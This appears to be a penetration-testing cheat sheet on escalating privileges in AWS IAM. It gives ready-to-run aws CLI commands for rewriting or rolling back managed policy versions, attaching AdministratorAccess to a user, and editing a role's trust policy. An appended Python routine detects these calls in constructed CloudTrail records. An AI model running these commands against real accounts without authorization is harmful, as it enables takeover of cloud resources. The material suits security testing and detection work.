IAM - Privilege Escalation

Tips and tricks for escalating privileges using IAM actions.

iam:CreatePolicyVersion and iam:SetDefaultPolicyVersion

  • If both of these actions are available, you can create a new version of an existing managed policy with modified permissions and set it as the default version, so it takes effect for every principal the policy is attached to.

  • Save an IAM permissions policy to a local JSON file, e.g.:

# example iam policy

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": "s3:*",
            "Resource": "*"
        }
    ]
}

aws iam create-policy-version --policy-arn arn:aws:iam::<accountId>:policy/<policyName> --policy-document file://<policyName>.json --set-as-default

Escalate Privileges by IAM Policy Rollback

iam:SetDefaultPolicyVersion

  • If this action is available, you can make a different existing version of a managed policy the default version, which changes the permissions of every principal the policy is attached to, including your own IAM user.

  • An older or newer version may carry a different, possibly broader, set of privileges that gives you more or new access.

# view available versions of a policy
aws iam list-policy-versions --policy-arn <policyArn>

# view the policy for a particular version
aws iam get-policy-version --policy-arn <policyArn> --version-id <versionId>

# attach a specific version of a policy
aws iam set-default-policy-version --policy-arn <policyArn> --version-id <versionId>

iam:AttachUserPolicy

  • If this action is available, you can attach a new managed policy to an IAM user.

aws iam attach-user-policy --policy-arn arn:aws:iam::aws:policy/AdministratorAccess --user-name <userName>

iam:UpdateAssumeRolePolicy

  • With this action, you can modify an IAM role's trust policy so that a principal you control is allowed to assume the role.

  • The trusted principal can be an IAM user, an IAM role, or an AWS service.

# example trust policy

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "AWS": "arn:aws:iam::<accountId>:user/<userName>"
            },
            "Action": "sts:AssumeRole"
        }
    ]
}

aws iam update-assume-role-policy --role-name <roleName> --policy-document file://<trustPolicy>.json
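Each of the four IAM calls above is written to CloudTrail as an `iam.amazonaws.com` event. The following detection routine is an added example, not part of the original page: it walks a batch of CloudTrail-style records, flags the calls that match these escalation paths, and marks whether the caller is the direct beneficiary (attaching a policy to their own user, or adding themselves to a role's trust policy). The account ID, principal names and policy ARN in the sample records are constructed, and the records carry only the CloudTrail fields the checks need (`eventName`, `userIdentity.arn`, `requestParameters`).

```python
import json
from urllib.parse import unquote

ACTOR = "arn:aws:iam::111122223333:user/dev-user"      # constructed caller identity
POLICY = "arn:aws:iam::111122223333:policy/DevPolicy"  # constructed policy ARN

def ct_event(name, **params):
    """Minimal CloudTrail-style IAM record (constructed sample data, not real logs)."""
    return {"eventSource": "iam.amazonaws.com", "eventName": name,
            "userIdentity": {"arn": ACTOR}, "requestParameters": params}

SAMPLE_EVENTS = [  # the four calls from this page plus one benign read that must not fire
    ct_event("CreatePolicyVersion", policyArn=POLICY, setAsDefault=True),
    ct_event("SetDefaultPolicyVersion", policyArn=POLICY, versionId="v1"),
    ct_event("AttachUserPolicy", userName="dev-user",
             policyArn="arn:aws:iam::aws:policy/AdministratorAccess"),
    ct_event("UpdateAssumeRolePolicy", roleName="DeployRole", policyDocument=json.dumps(
        {"Version": "2012-10-17", "Statement": [{"Effect": "Allow",
         "Principal": {"AWS": ACTOR}, "Action": "sts:AssumeRole"}]})),
    ct_event("GetUser", userName="dev-user"),
]

def trust_principals(policy_document):
    """AWS principals allowed to assume the role; CloudTrail may URL-encode the JSON."""
    out = []
    for stmt in json.loads(unquote(policy_document)).get("Statement", []):
        pr = stmt.get("Principal", {}) if stmt.get("Effect") == "Allow" else {}
        aws = pr.get("AWS", []) if isinstance(pr, dict) else pr  # Principal may be "*"
        out.extend([aws] if isinstance(aws, str) else aws)
    return out

def flag_iam_escalation(events):
    """Return (actor, eventName, detail, self_grant) per matching call; self_grant is None
    for policy-version changes, which affect every principal the policy is attached to."""
    findings = []
    for ev in (e for e in events if e.get("eventSource") == "iam.amazonaws.com"):
        name, p = ev["eventName"], ev.get("requestParameters") or {}
        actor = ev.get("userIdentity", {}).get("arn", "")
        if name == "CreatePolicyVersion" and p.get("setAsDefault"):
            findings.append((actor, name, f"new default version of {p['policyArn']}", None))
        elif name == "SetDefaultPolicyVersion":
            findings.append((actor, name, f"{p['policyArn']} switched to {p['versionId']}", None))
        elif name == "AttachUserPolicy":
            findings.append((actor, name, f"{p['policyArn']} -> user/{p['userName']}",
                             actor.endswith(f":user/{p['userName']}")))
        elif name == "UpdateAssumeRolePolicy":
            who = trust_principals(p["policyDocument"])
            findings.append((actor, name, f"role/{p['roleName']} trusts {', '.join(who)}", actor in who))
    return findings
```

For the policy-version cases the event alone cannot show who gains access; correlating the `policyArn` with `iam list-entities-for-policy` output, or diffing the new default against the previous version with `iam get-policy-version`, closes that gap.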